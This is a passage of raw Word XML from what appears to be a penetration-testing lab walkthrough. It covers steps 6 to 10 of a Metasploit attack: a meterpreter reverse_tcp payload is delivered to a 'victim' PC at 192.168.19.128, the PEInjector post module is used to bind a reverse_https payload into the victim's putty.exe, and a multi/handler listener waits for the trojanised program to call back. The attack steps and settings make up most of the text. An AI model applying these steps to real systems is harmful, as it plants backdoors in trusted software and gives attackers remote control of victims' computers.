            <wp:extent cx="6692265" cy="4585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0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25" w:rsidRPr="00E73D69" w:rsidRDefault="00D368BB" w:rsidP="007033A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 w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Payload: windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00D368BB" w:rsidRPr="00E73D69" w:rsidRDefault="00D368BB" w:rsidP="007033A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 w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LHOST: 192.168.19.128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D368BB" w:rsidRDefault="00DF75F8" w:rsidP="007033A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>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LPORT: 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007033AD" w:rsidRPr="00E73D69" w:rsidRDefault="007033AD" w:rsidP="007033A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</w:p>
    <w:p w:rsidR="00FD07BE" w:rsidRPr="00E73D69" w:rsidRDefault="007033AD" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr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Step 6</w:t>
      </w:r>
      <w:r w:rsidR="00FD07BE" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00FD07BE" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Deliver and Run the malware on our target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD07BE" w:rsidRPr="00E73D69" w:rsidRDefault="00DF75F8" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6692265" cy="15957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BE" w:rsidRPr="00E73D69" w:rsidRDefault="00FD07BE" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FD07BE" w:rsidRPr="00E73D69" w:rsidRDefault="00FD07BE" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007033AD" w:rsidRDefault="007033AD" w:rsidP="007033AD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3405"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007033AD" w:rsidRDefault="007033AD" w:rsidP="007033AD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3405"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007033AD" w:rsidRDefault="007033AD" w:rsidP="007033AD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3405"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D90006" w:rsidRPr="00E73D69" w:rsidRDefault="007033AD" w:rsidP="007033AD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3405"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr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>Step 7</w:t>
      </w:r>
      <w:r w:rsidR="00D90006" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D90006" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we established a connection on our attacker’s machine and gain a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D90006" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D90006" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D90006" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we will run the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D90006" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D90006" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>” and “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D90006" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D90006" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>” to check if we are system. In our case, we are not.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90006" w:rsidRPr="00E73D69" w:rsidRDefault="00A673FC" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6692265" cy="2067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0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FC" w:rsidRPr="00E73D69" w:rsidRDefault="007033AD" w:rsidP="007033AD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing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Payload </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Binding</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A673FC" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using MSF (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A673FC" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PEInjector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A673FC" w:rsidRPr="00E73D69">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A673FC" w:rsidRDefault="00A673FC" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007033AD" w:rsidRPr="007033AD" w:rsidRDefault="007033AD" w:rsidP="007033AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="4C4F53"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 8: </w:t>
      </w:r>
      <w:r w:rsidRPr="007033AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">We already have a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007033AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007033AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> session of the victim’s PC.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007033AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>Here, our approach is to find the executable files that exist in the victim’s pc so that we can bind the payload with the legitimate exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">utable file. </w:t>
      </w:r>
      <w:r w:rsidRPr="007033AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">We explore the different paths and drives of the victim’s pc suddenly in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="007033AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">ownloads we find the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="007033AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>putty.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="007033AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A673FC" w:rsidRPr="007033AD" w:rsidRDefault="007033AD" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6692265" cy="21628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AD" w:rsidRDefault="007033AD" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A673FC" w:rsidRDefault="00A673FC" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Session 1 will be put into background for later use. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A673FC" w:rsidRPr="00087724" w:rsidRDefault="00A673FC" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00087724" w:rsidRDefault="00087724" w:rsidP="00087724">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 9</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69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We will be using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PEInjector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Post Module. T</w:t>
      </w:r>
      <w:r w:rsidRPr="00087724">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>his module will inject specified windows payload into a target executable.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00087724">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">As we know, that victim is using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">putty.exe. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00087724">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve">next step is to inject the payload into it. To run this module we need to set the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00087724">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>targetpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00087724">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> which means the path of the target executable file of the victim’s pc into which payload need to inject.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC3F2D" w:rsidRDefault="00FC3F2D" w:rsidP="00735D06">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00735D06" w:rsidRDefault="00735D06" w:rsidP="00735D06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 w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the variables for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>post/windows/manage/peinjector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00735D06" w:rsidRPr="00E73D69" w:rsidRDefault="00735D06" w:rsidP="00735D06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 w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LHOST: 192.168.19.128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00735D06" w:rsidRPr="00E73D69" w:rsidRDefault="00735D06" w:rsidP="00735D06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>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LPORT: 4433</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00735D06" w:rsidRDefault="00735D06" w:rsidP="00735D06">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00E73D69">
        <w:t xml:space="preserve">SESSION: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E73D69">
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00735D06" w:rsidRPr="00E73D69" w:rsidRDefault="00735D06" w:rsidP="00735D06">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>TARGETPE: C:\\Users\\Mackoy_Lucido\\Downloads\\putty.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00735D06" w:rsidRDefault="00735D06" w:rsidP="00087724">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00087724" w:rsidRPr="00087724" w:rsidRDefault="00735D06" w:rsidP="00087724">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="4C4F53"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="4C4F53"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6692265" cy="5182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24" w:rsidRDefault="00087724" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00735D06" w:rsidRDefault="00735D06" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr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Step 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Start the L</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>istener (exploit/multi/handler)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and set the variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00E73D69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 xml:space="preserve"> Run “putty.exe” on the victim’s machine and wait for the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC3F2D" w:rsidRDefault="00FC3F2D" w:rsidP="00FC3F2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</w:p>
    <w:p w:rsidR="00FC3F2D" w:rsidRDefault="00FC3F2D" w:rsidP="00FC3F2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>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Variables:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC3F2D" w:rsidRPr="00E73D69" w:rsidRDefault="00FC3F2D" w:rsidP="00FC3F2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 w:rsidRPr="00E73D69">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LHOST: 192.168.19.128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC3F2D" w:rsidRDefault="00FC3F2D" w:rsidP="00FC3F2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>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LPORT: 4433</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC3F2D" w:rsidRPr="00E73D69" w:rsidRDefault="00FC3F2D" w:rsidP="00FC3F2D">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>PAYLOAD: windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>reverse_https</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00FC3F2D" w:rsidRDefault="00FC3F2D" w:rsidP="007033AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
